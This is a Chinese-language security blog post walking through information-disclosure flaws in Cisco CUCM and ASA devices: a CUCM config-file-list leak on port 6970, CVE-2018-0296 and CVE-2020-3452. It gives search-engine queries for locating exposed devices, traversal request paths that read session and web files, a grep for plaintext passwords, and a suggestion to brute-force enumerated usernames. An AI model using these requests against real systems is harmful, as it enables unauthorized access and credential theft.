CISCO裝置資訊洩漏漏洞案例2

前言

上一篇文章介紹了cisco路由器裝置的2個漏洞案例，這次補充cisco ip電話裝置和安全裝置的漏洞案例。

CISCO-UCM ConfigFileCacheList。txt 洩漏

CISCO-UCM 全稱Cisco Unified Communications Manager，是用於整合CISCO的語音影片通話、訊息傳遞和移動協作的基礎設施

部分 CUCM 伺服器在埠 TCP/6970 上有一個 HTTP 服務，其中存在 ConfigFileCacheList。txt 檔案，包含位於 TFTP 目錄中的所有檔名

fofa語句

product==“CISCO-UCM”

shodan語句

http。html：“Cisco Unified Communications Manager”

payload

x。x。x。x：6970/ConfigFileCacheList。txt

在目標檔案中包含了許多SEP開頭的檔案，那是ip電話的配置檔案，sep後面接的是mac地址

可以遍歷下載這個ConfigFileCacheList。txt檔案內容中的所有檔案

在下載的配置檔案中，包含ip，描述，埠等配置資訊

甚至有的還會包含明文的賬號密碼

【——幫助網安學習，以下所有學習資料關注我，私信回覆“資料”獲取——】

① 網安學習成長路徑思維導圖

② 60+網安經典常用工具包

③ 100+SRC漏洞分析報告

④ 150+網安攻防實戰技術電子書

⑤ 最權威CISSP 認證考試指南+題庫

⑥ 超1800頁CTF實戰技巧手冊

⑦ 最新網安大廠面試題合集（含答案）

⑧ APP客戶端安全檢測指南（安卓+IOS）

可以用egrep批次查詢

egrep -r ‘Password’ *。xml

在配置檔案中獲得了賬號密碼後，可以嘗試登入UCM的web後臺

當然這個 ConfigFileCacheList。txt 洩漏比較少見，如果遇到UCM可以試試訪問

/cucm-uds/users

路徑，可以洩漏使用者名稱資訊，再針對使用者名稱進一步爆破弱口令

CVE-2018-0296 Cisco ASA 目錄遍歷漏洞

Cisco ASA是思科的防火牆裝置，一般用於在企業邊界，包含了ips，avc，wse等應用功能。

fofa語句

app=“CISCO-ASA-5520”

根據文章

https：//www。anquanke。com/post/id/171916

中的描述，CVE-2018-0296在不同型號裝置上存在2種利用場景，一種是拒絕服務造成裝置崩潰重啟，一種是目錄遍歷獲得敏感資訊

在修復方案中則是增加了對

。/

和

。。/

的處理邏輯，以防止目錄遍歷

拒絕服務這裡就不具體測試了，主要看下目錄遍歷的利用

檢測poc

/+CSCOU+/。。/+CSCOE+/files/file_list。json

注意，類似的poc不能在瀏覽器裡直接貼上訪問，因為瀏覽器會自動將訪問的路徑類似/。。/解析為上一級目錄，也就是訪問的為

/+CSCOE+/files/file_list。json

列出 /sessions 目錄的內容

/+CSCOU+/。。/+CSCOE+/files/file_list。json？path=/sessions

提取登入使用者的登入資訊

/+CSCOU+/。。/+CSCOE+/files/file_list。json？path=/sessions/［name］

CVE-2020-3452 Cisco ASA 目錄遍歷漏洞

CVE-2020-3452漏洞可以在未驗證的情況下進行任意檔案讀取

該漏洞源於 ASA 和 FTD 的 web 服務介面在處理 HTTP 請求的 URL 時缺乏正確的輸入驗證，導致攻擊者可以在目標裝置上檢視系統內的web目錄檔案。

此漏洞不能用於獲取對 ASA 或 FTD 系統檔案或底層作業系統 （OS） 檔案的訪問，所以只能讀取 web 系統目錄的檔案，比如 webvpn 的配置檔案、書籤、網路 cookies、部分網路內容和超文字傳輸協議網址等資訊。

作者在推特分享的檢測poc

https：//twitter。com/aboul3la/status/1286141887716503553

/

+

CSCOT

+

/oem-customization

？app

=

AnyConnect

&type

=

oem

&platform

=

。。

&resource-type

=

。。

&name

=

%2bCSCOE%2b/portal_inc。lua

/

+

CSCOT

+

/translation-table

？type

=

mst

&textdomain

=

/%2bCSCOE%2b/portal_inc。lua&default-language

&lang

=

。。/

讀取

/+CSCOE+/portal_inc。lua

檔案

至於進一步利用，有研究人員給出了一些已知檔案列表

https：//twitter。com/HackerGautam/status/1286652700432662528

https：//raw。githubusercontent。com/3ndG4me/CVE-2020-3452-Exploit/master/cisco_asa_file_list。txt

不過實際測試，除了

session。js

跑出了一個亂碼的內容以外，其他的檔案多是一些資原始檔，難以進一步利用。